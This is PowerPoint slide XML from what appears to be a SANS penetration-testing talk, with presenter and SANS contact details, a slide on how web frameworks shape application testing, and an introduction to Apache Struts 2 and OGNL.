        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6567092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RESOURCES AND CONTACT INFORMATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1524000"/>
            <a:ext cx="5547360" cy="2159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defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="3810000"/>
            <a:ext cx="5547360" cy="2159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defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1524000"/>
            <a:ext cx="5550408" cy="2159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defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3810000"/>
            <a:ext cx="5550408" cy="215900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defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1524000"/>
            <a:ext cx="3810000" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91412" tIns="45706" rIns="91412" bIns="45706" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>AUTHOR CONTACT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Justin Searle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>justin@meeas.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>meeas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adrien de Beaupré</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>adriendb@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>adriendb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7760208" y="1524000"/>
            <a:ext cx="3822192" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91412" tIns="45706" rIns="91412" bIns="45706" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>SANS INSTITUTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>11200 Rockville Pike, Suite 200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>North Bethesda, MD  20852 301.654.SANS(7267)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7760208" y="3810000"/>
            <a:ext cx="3822192" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91412" tIns="45706" rIns="91412" bIns="45706" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>SANS EMAIL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>GENERAL INQUIRIES: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>info@sans.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>REGISTRATION: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>registration@sans.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>TUITION: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>tuition@sans.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>PRESS/PR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>press@sans.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" charset="0"/>
              <a:ea typeface="Gill Sans MT" charset="0"/>
              <a:cs typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3810000"/>
            <a:ext cx="3810000" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91412" tIns="45706" rIns="91412" bIns="45706" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>PEN TESTING RESOURCES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>pen-testing.sans.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Twitter: @SANSPenTest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914146" y="2247900"/>
            <a:ext cx="698500" cy="711200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914146" y="4540250"/>
            <a:ext cx="698500" cy="698500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604254" y="2260600"/>
            <a:ext cx="698500" cy="698500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604254" y="4502150"/>
            <a:ext cx="698500" cy="711200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1798691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cap="none" dirty="0"/>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web frameworks affects app complexity:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Changes the approach that a tester uses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Adds additional layers of obscurity and abstraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With familiarity of a framework we can use a methodology:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Version? Identify known vulnerabilities in the framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Classes of issues may affect multiple frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tests for default settings and known weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Enables testers to try and infer design patterns for weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Every application inherits flaws from every framework and library in use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1732627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2800" cap="none" dirty="0"/>
              <a:t>Struts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is struts?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Struts 2 is a framework or API that is an Apache Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Developers write their applications to this API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implements 'Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> View </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Controller' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	The view portion features different templating languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	- OGNL ('getter' and 'setter')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	- Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FreeMarker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
